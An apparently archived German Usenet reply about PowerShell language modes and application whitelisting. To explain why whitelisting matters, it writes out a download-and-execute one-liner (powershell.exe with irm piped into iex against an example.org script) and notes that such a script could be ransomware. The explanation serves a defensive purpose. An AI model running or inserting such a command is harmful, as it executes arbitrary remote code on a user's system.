Groups | Search | Server Info | Keyboard shortcuts | Login | Register [http] [https] [nntp] [nntps]
Groups > de.comp.os.ms-windows.misc > #234824
| From | "Christoph Schneegans" <christoph@schneegans.de> |
|---|---|
| Newsgroups | de.comp.os.ms-windows.misc |
| Subject | Re: Powershell function ohne Admin-Rechte |
| Date | 2026-01-16 08:21 +0100 |
| Message-ID | <msu780F2hujU1@mid.individual.net> (permalink) |
| References | <HGAcmfIYVaB@point04.soemtron.de><HGnjjOQIVaB@point04.soemtron.de> <mspvoqFbfsrU1@mid.individual.net> <HGvkYaw2VaB@point04.soemtron.de> |
Christian @Soemtron schrieb: > Christoph Schneegans <christoph@schneegans.de> schrieb: > >> Schadsoftware mag es, wenn sie PowerShell-Code ausführen kann, und >> das macht sie typischerweise nicht mit einer Datei, sondern per >> »powershell.exe -Command " "«. > > Aber doch nur Scripte aus freigegebenen Verzeichnissen - wie soll ein > Schadscript da hinkommen? Ein Angreifer muss keine Datei ablegen. Es genügt, durch eine Sicherheitslücke in Browser oder E-Mail-Programm oder wie auch immer den kurzen Befehl powershell.exe -Command "irm 'https://example.org/temp/test.ps1'|iex" zur Ausführung zu bringen. In test.ps1 kann sich etwa ein Ransomware-Script befinden, und dieses Skript kann im FullLanguage-Sprachmodus viel mehr und viel leichter Unfug treiben als im ConstrainedLanguage-Sprachmodus. >> Wenn du auf einem System mit Whitelisting-Konfiguration (egal >> ob SAFER oder AppLocker) PowerShell als eingeschränkter Benutzer >> und im FullLanguage-Sprachmodus starten willst, musst du deshalb >> vorübergehend dafür sorgen, dass diese Skripte zugelassen werden. > > Oje, was für ein Aufwand. Ich mache das im Idealfall einmal pro Monat, und die beiden PowerShell-Sitzungen – eine mit Administrator-Rechten, eine ohne, aber beide im FullLanguage-Sprachmodus – bleiben offen, solange Windows läuft. -- https://schneegans.de/windows/unattend-generator/ · unattend.xml erzeugen
Back to de.comp.os.ms-windows.misc | Previous | Next — Previous in thread | Next in thread | Find similar
Powershell function ohne Admin-Rechte christian_dcomwm-ENTF@soemtron.de (Christian @Soemtron) - 2026-01-03 20:56 +0200
Re: Powershell function ohne Admin-Rechte Werner Tann <wtann@gmx.at> - 2026-01-04 08:25 +0100
Re: Powershell function ohne Admin-Rechte Werner Tann <wtann@gmx.at> - 2026-01-04 11:54 +0100
Re: Powershell function ohne Admin-Rechte christian_dcomwm-ENTF@soemtron.de (Christian @Soemtron) - 2026-01-04 13:21 +0200
Re: Powershell function ohne Admin-Rechte Arno Welzel <usenet@arnowelzel.de> - 2026-01-08 14:06 +0100
Re: Powershell function ohne Admin-Rechte Joerg Gerlach <jger@gmx.de> - 2026-01-05 19:29 +0100
Re: Powershell function ohne Admin-Rechte christian_dcomwm-ENTF@soemtron.de (Christian @Soemtron) - 2026-01-06 11:16 +0200
Re: Powershell function ohne Admin-Rechte christian_dcomwm-ENTF@soemtron.de (Christian @Soemtron) - 2026-01-13 09:32 +0200
Re: Powershell function ohne Admin-Rechte "Christoph Schneegans" <christoph@schneegans.de> - 2026-01-14 17:49 +0100
Re: Powershell function ohne Admin-Rechte christian_dcomwm-ENTF@soemtron.de (Christian @Soemtron) - 2026-01-15 21:53 +0200
Re: Powershell function ohne Admin-Rechte "Christoph Schneegans" <christoph@schneegans.de> - 2026-01-16 08:21 +0100
Re: Powershell function ohne Admin-Rechte christian_dcomwm-ENTF@soemtron.de (Christian @Soemtron) - 2026-01-19 11:41 +0200
Re: Powershell function ohne Admin-Rechte "Christoph Schneegans" <christoph@schneegans.de> - 2026-01-23 23:28 +0100
csiph-web